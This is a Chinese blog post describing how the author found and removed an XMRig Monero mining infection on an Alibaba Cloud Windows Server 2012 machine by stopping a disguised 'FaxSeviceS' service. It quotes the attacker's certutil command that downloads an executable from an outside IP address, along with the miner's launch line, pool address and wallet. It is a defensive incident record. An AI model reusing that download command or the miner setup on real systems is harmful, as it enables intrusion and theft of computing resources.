WindowsServer2012 清除 xmrig miner 门罗币挖矿病毒记录

原因

登录阿里云服务器 WindowsServer2012 远程桌面,发现任务管理器中,存在可疑进程 “XMrig.exe” 占用 cpu 高达 50%以上,内存2个多G。

百度发现 xmrig miner 为 门罗币挖矿机器。

登录到 阿里云 在线管理平台,发现出现了多次告警时间(隔了20多天才看到,好惭愧)

该告警由如下引擎检测发现:
执行命令的进程:xxxxx/oracle/product/10.2.0/db_1/database/System
恶意文件md5:1da0bf986119a583285499047edcd74a
进程id:9,632
描述:通常黑客入侵后会植入挖矿程序赚取收益,该类程序占用CPU等资源,影响用户正常业务,危害较大。且该程序可能还存在自删除行为,
或伪装成系统程序以躲避检测。如果发现该文件不存在,请检查是否存在可疑进程、定时任务或启动项。具体详情可查看帮助:

https://helpcdn.aliyun.com/knowledge_detail/41206.html

该告警由如下引擎检测发现:
父进程路径:xxxxx/oracle/product/10.2.0/db_1/BIN/oracle.exe
父进程命令行:xxxxx\oracle\product\10.2.0\db_1\bin\ORACLE.EXE ORCL
父进程id:1584
进程id:10736
URL链接:http://60.12.77.171:807/fax3.exe
进程路径:C:/Windows/SysWOW64/cmd.exe
命令行参数:cmd /c certutil.exe -urlcache -split -f http://60.12.77.171:807/fax3.exe

一下明白了,被挖矿植入了。通过 oracle 的进程从官网上下载程序,安装并植入。

幸运的是,挖矿程序没有对正常的程序造成影响。

采取步骤

  1. 先备份所有必须的文件
  2. 查找资料
  3. Window 日志管理器

查日志文件,看看有什么异常,别人怎么进来的,进来以后干了些什么。查进程、 分析木马是如何加载的,把对应的木马清除,把漏洞补上。
这个对专业的来说并不复杂。

杀毒软件这种东西不是给服务器用的。 服务器不用的端口全关了,不用的权限都禁掉,只开需要的权限和端口,硬件防火墙

发现搜索了很久,也没找到完全合适的解决办法。(又深深地体会到技术在于平时的积累呀)

尝试1 任务管理器,强制关闭进程。

【结果】发现进程立刻重新启动了。 哭~~~

尝试2 搜索windows如何终止可启动的进程

如何清除病毒等,文章到时一大堆,可没有合适的

发现系统的调度程序会自动启动该程序

【结果】还是没解决

尝试3 结合日志管理器 【解决】

发现只要终止进程,就会在日志管理器上产生一个日志

Started C:\oracle\product\10.2.0\db_1\DATABASE\System -a cn/r -o 
stratum+tcp://pool.supportxmr.com:5555 -u 47BoNDRZPB9VZ6fHZvHJUvFGV7J76d6zxPAP9Z5K879EKMLD4cecEnKJsH2FHBwgZwaFahLPKCaBtPcCEt4wmePo2VwXKgy -p xin
 --donate-level 1 for service FaxSeviceS in C:\oracle\product\10.2.0\db_1\DATABASE.

pool.supportxmr.com:5555

C:\oracle\product\10.2.0\db_1\DATABASE\Process.exe

重点就是“ service FaxSeviceS ” 这个是服务的名字!
那么,在服务窗口,停止服务,
接下来,终止进程
再后来,删除可疑文件

问题【解决】

后续步骤

  1. 更改远程桌面 连接密码

解决办法

  1. 购买阿里云 云安全中心高级版
  2. 养成定时备份服务器习惯

后续思考

  1. 病毒怎么进来的?
  2. 怎么防护

参考资料

Kubernetes集群节点被入侵挖矿,CPU被占满
https://www.lijiaocn.com/%E9%97%AE%E9%A2%98/2018/07/20/kubernetes-docker-cpu-high.html

阿里云服务器遭受挖矿程序的入侵的清理之战
https://blog.csdn.net/qq_38685242/article/details/97390088

阿里云ECS遭挖矿程序攻击解决方法(彻底清除挖矿程序,顺便下载了挖矿程序的脚本)
https://blog.csdn.net/zzf1510711060/article/details/83015700%20in

初步解决挖矿病毒xmrig cpu miner
https://blog.csdn.net/qq_42906657/article/details/82726906

你可能感兴趣的:(操作系统)